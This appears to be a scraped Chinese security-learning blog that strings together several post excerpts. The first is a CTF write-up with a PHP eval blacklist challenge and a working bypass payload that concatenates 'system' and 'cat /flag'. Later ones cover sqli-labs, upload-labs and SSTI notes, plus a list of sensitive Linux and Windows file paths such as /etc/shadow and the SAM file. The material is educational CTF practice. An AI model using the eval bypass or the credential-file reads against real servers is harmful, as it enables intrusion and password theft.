web部分

swp

简单RCE

从GPT身上学到一种php中命令执行绕过思路，

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
function no($txt){
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
    return $txt;}
   else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
  eval(no($_GET['sys']));
  }
  else
    {echo "nonono";
}
?> 

可以看到是黑名单过滤，通过;可以执行多语句命令，通过变量赋值以及调用即可完成绕过，空格可以用chr(32)代替，所有字符可以利用.来进行来来连接。

1
2
3

http://032c9277-dd21-4a2e-9cc6-c3e6158ba6c8.www.polarctf.com:8090/?sys=$a="s"."ystem";$b="ca"."t".chr(32)."/flag";$a($b);

POST参数：yyds=666

[TOC]

前言

花了两天时间，终于把sqli-lab前20关都刷完了！感觉之前只有朦胧的对sqli的印象，结果现在才知道我见过的只是get类型的union注入，最简单的那种（晕）。。。
了解和实践了很多注入手法，union，报错，延时，布尔…..前段时间面试实验室的时候其实还不了解就敢说自己懂（惭愧
《从0到1：CTFer成长之路》这本书我觉得很棒，希望能尽快看完！
我参考了很多师傅的wp以及相关文章，一并附在了文章结尾。那么，下面是我的题目总结，有一些没写或者简写，以及没有图片（还没想到怎样简化插入图片还能上传到网站的办法），如果观感不好请多担待。

[TOC]

upload-labs靶场刷题个人总结

文件上传基本思路

一般是网站有相关的文件上传的地方，例如传图片文本之类，我们会尝试在这里绕过各种waf最终达到上传一个后门来达到连接服务器的目的。

https://www.cnblogs.com/bmjoker/p/13508538.html

https://hello-ctf.com/hc-web/ssti

（未开）

初探 Python Flask+Jinja2 SSTI - Zh1z3ven - 博客园

敏感文件总结

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Linux：
/proc/self/cmdline //当前进程
/proc/self/environ //环境变量
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/etc/my.conf //mysql 配置文件
/etc/httpd/conf/httpd.conf // Apache配置文件
/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置
/usr/local/app/php5/lib/php.ini //PHP相关配置

Windows：
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root密码
C:\Windows\php.ini //php配置信息

php相关漏洞

Wrapper机制

PHP 提供的文件打开方式不仅仅是简单的文件路径，而是通过文件流的方式进行操作。这些文件流可以被看作是一种特殊的协议，即 Wrapper 协议（PHP中有很多功能不同但形式相似的协议，统称为Wrapper）。

Filter机制

（为什么莫名其妙插入了一张图片？原因是我终于找到能粘贴图片并直接放在同名文件夹中的方法了，太兴奋了！！！）

参考文章：

https://www.cnblogs.com/ikn0w1T/p/17299303.html

https://www.cnblogs.com/zyfzjuer/articles/15408680.html

本地模型的搭建

我个人用Ollama+openUI来实现本地模型的搭建。下面详细说明具体细节。

Web

正值大一的第一个寒假。

之前看到群里很多大佬都有一个独属于自己的个人博客，很是羡慕，于是闲来无事，打算自己也搭建一个，用来记录我以后的学习和生活日常。

在B站MIT的线代课评论区中，看到有人提到了此课程，于是带着好奇心去看了这门课。